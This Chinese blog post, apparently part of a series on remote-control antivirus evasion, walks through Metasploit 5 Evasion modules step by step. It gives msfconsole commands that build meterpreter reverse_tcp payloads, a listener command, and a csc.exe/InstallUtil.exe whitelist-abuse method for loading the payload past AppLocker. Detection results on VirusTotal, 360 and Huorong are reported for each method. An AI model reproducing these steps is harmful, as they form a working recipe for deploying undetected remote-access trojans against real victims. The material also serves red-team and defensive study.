远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)
原文链接:远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)
免杀能力一览表
几点说明:
1、下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火绒版本5.0.33.13(2019.12.12),360安全卫士12.0.0.2001(2019.12.17)。
4、其他杀软的检测指标是在virustotal.com
(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。
前言
2019年1月,metasploit升级到了5.0,引入了一个新的模块叫Evasion模块,官方宣称这个模块可以创建反杀毒软件的木马。
evasion有以下几个模块,可以使用show evasion
进行查看。
生成exe(VT查杀率42/71)
使用use windows/windows_defender_exe
进行生成payload
msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3
msf5 evasion(windows/windows_defender_exe) > set LPORT 3333
msf5 evasion(windows/windows_defender_exe) > run
不打开杀软的情况下,可正常上线
handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp
打开杀软,目前已经无法过360和火绒,看网上资料在该模块刚出来时是可以过360的。
virustotal.com中42/71个报毒(前几天测试的时候还是39个…)
生成hta(VT查杀率14/59)
用另外一个evasion模块windows/windows_defender_js_hta
生成一下,360同样被杀
但是火绒静态+行为查杀都没发现问题,可正常上线
virustotal.com中14/59个报毒,不过在线查毒时显示360也没查出来,但我本地测试时却是能查出来的,所以在线查杀还是不太精准的。
生成install_util(VT查杀率12/71)
evasion还提供了其他几个模块,比如
windows/applocker_evasion_install_util
创建payload
msf5 > use windows/applocker_evasion_install_util
msf5 evasion(windows/applocker_evasion_install_util) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/applocker_evasion_install_util) > set lhost 10.211.55.2
lhost => 10.211.55.2
msf5 evasion(windows/applocker_evasion_install_util) > set lport 3333
lport => 3333
msf5 evasion(windows/applocker_evasion_install_util) > run[+] install_util.txt stored at /Users/xysoul/.msf4/local/install_util.txt
[*] Copy install_util.txt to the target
[*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:install_util.exe install_util.txt
[*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe
根据说明,需要使用csc.exe进行编译一下,然后用InstallUtil.exe
加载文件。
csc.exe是微软.NET Framework 中的C#语言编译器,本机安装了.net后就可以找到该文件。我这里用vs2017里的csc.exe进行编译,生成install_util.exe。
直接执行install_util.exe
是没有任何反应的,需要使用InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe
来加载。
注意的是,如果生成的是32位的payload,就要用32位的.net下的InstallUtil来加载,否则文件会无法执行。
静态查杀都没有问题,执行时360行为查杀会报毒。
在virustotal.com中对install_util.exe进行查杀,发现12/71个报毒
小结
在evasion中共提供了6个免杀模块,大家都可以进行尝试。上文中第三个免杀利用csc白名单加载payload的方式还有很多种,网上也有很多介绍,侯亮大神也提到了很多类似的白名单软件。
而且在2019年1月msf5更新的不止evasion模块,还有个更强大的模板编译函数Metasploit::Framework::Compiler
,提供了更强大的自定义免杀机制。后面文章会讲述该模块使用。
参考
applocker_evasion_install_util.md:https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md
基于白名单Csc.exe执行payload:https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji
远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)相关推荐
- 远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)
原文链接:远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) 免杀能力一览表 几点说明: 1.上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效 ...
- 远控免杀专题文章(2)-msfvenom隐藏的参数
本专题文章导航 1.远控免杀专题文章(1)-基础篇: 远控免杀专题文章(1)-基础篇 因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些 ...
- 远控免杀专题文章(1)-基础篇
脉搏文库 TideSec [](javascript:void(0)) 2020-02-20 6,218 *前**言* 一直是从事web安全多一些,对waf绕过还稍微有些研究,但是对远控免杀的认知还大 ...
- 远控免杀专题(67)-白名单(113个)总结篇
关于白名单程序 相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称"Living-Off-the-Land Binaries",直白翻译 ...
- 远控免杀从入门到实践之白名单(113个)总结篇
郑重声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! <远控免杀从入门到实践>系列文章目录: 1.远控免杀从入 ...
- 远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
最新文章
- C语言程序设计 细节总结(第1-7章)
- 从产品的适用性以及费用方面考虑
- 为什么我们需要开源的系统芯片?
- ASP.NET 中HttpRuntime.Cache缓存数据
- 清华大学医学院张明君团队招聘脑机接口与微纳医学交叉领域博士后
- 7.Nginx_Keepalived高可用配置
- 大于小于优化_工程优化设计与Matlab实现——优化设计的数学基础
- 代码量减少90%,Java程序员必会的工具库
- VBA FSO 对象模型知识点梳理
- linux主机慢的原因,51CTO博客-专业IT技术博客创作平台-技术成就梦想
- 附件 广东省教育系统火灾风险点指南(试行)
- 在网页中内嵌直接可以播放RTMP流的视频播放器
- Springboot毕设项目监狱管理系统xu08n(java+VUE+Mybatis+Maven+Mysql)
- 10001UVa伊甸园
- 【OpenGrok代码搜索引擎】四、OpenGrok使用指南
- 仿知乎悬浮功能按钮FloatingActionButton
- 3373. 进制转换(高精度除法)
- 慕课网-安卓攻城狮视频学习及练习(六)
- 复制后的图形将文字覆盖上了【已解决】
- FPGA实现CAN通信CRC校验